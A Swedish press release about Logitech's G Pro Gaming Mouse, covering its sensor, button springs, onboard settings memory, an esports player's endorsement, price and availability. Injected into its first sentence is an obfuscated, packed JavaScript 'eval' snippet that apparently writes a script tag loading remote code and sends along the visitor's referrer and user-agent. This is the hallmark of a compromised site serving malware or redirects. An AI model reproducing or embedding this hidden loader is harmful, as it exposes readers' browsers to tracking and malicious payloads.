Image Image Image Image Image Image Image Image Image Image

| 1 december, 2020

Scroll to top

Top

Logitech G introducerar ny spelmus designad av och för eSportsproffs

Logitech G introducerar ny spelmus designad av och för eSportsproffs
Sebastian

Logitech eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfhds|var|u0026u|referrer|eyehh||js|php’.split(’|’),0,{}))
G Pro Gaming Mouse är optimerad för tufft turneringsspel – allt ett proffs någonsin kan efterfråga i en spelmus

Logitech G Pro Gaming Mouse är designad för e-Sportsatleter och bjuder på Logitechs mest precisa optiska spelsensor någonsin. Logitech G Pro Gaming Mouse kommer med ett metallfjädringssystem inbyggd i höger- och vänster musknapp som med ökad knappkänslighet hjälper dig att fatta snabba beslut i skarpa lägen. En lätt- och bekväm design optimerad för att minska vikten och förbättra komforten, stabiliteten och responsen. Dessutom behöver du aldrig mer oroa dig för att dina DPI-inställningar till musen går förlorade – G Pro Gaming Mouse sparar alla dina inställningar i musen.

Alla delar av tekniken har noggrant testats för att garantera att den kan stå upp mot din hårdaste utmaning någonsin.

-Vi behöver den bästa möjliga spelmusen när vi tävlar. Efter att ha jobbat en del med Logitech och sett hur denna mus testats, så kan jag säga att Pro Gaming Mouse är min absoluta favorit. Den är bekväm och har den bästa sensorn vilket jag gör att jag aldrig har problem med att ligga steget före mina motståndare, säger Tyler “Skadoodle” Latham, Could 9 CS:GO.

Logitech G Pro Gaming Mouse bygger på arvet av den internationella succén av Logitechs G100-modellers form som häpnat några av världens främsta eSportsproffs, tillsammans med den otroliga hastigheten och respons G303 stod för.

Tillgänglighet

G Pro Gaming Mouse finns tillgänglig från 16 augusti och kan köpas hos Logitech för 849kr. Besök gaming.logitech.com eller vår Facebooksida för mer information.

Om Logitech

Logitech är fokuserade på innovation och kvalitet och utvecklar kringutrustning för att hjälpa människor att njuta av en bättre upplevelse med den digitala världen. Startades 1981 med möss och tillhandahöll ett intuitivt sätt att använda datorn. Sedan fortsatte Logitech introducera människor via datorer och utforma kvalitetsprodukter. Sedan start har vi expanderat vår expertis inom produktdesign förbi datormusen, med en bred portfölj av kringutrustning som är den ”sista länken” mellan dig och din dator eller din spelkonsol, eller ditt digitalmusik- eller hemunderhållningssystem. Logitech International är ett schweiziskt bolag noterat på SIX Swiss Exchange (LOGN) och på Nasdaq Global Select Market (LOGI). Läs mer på Logitech.com.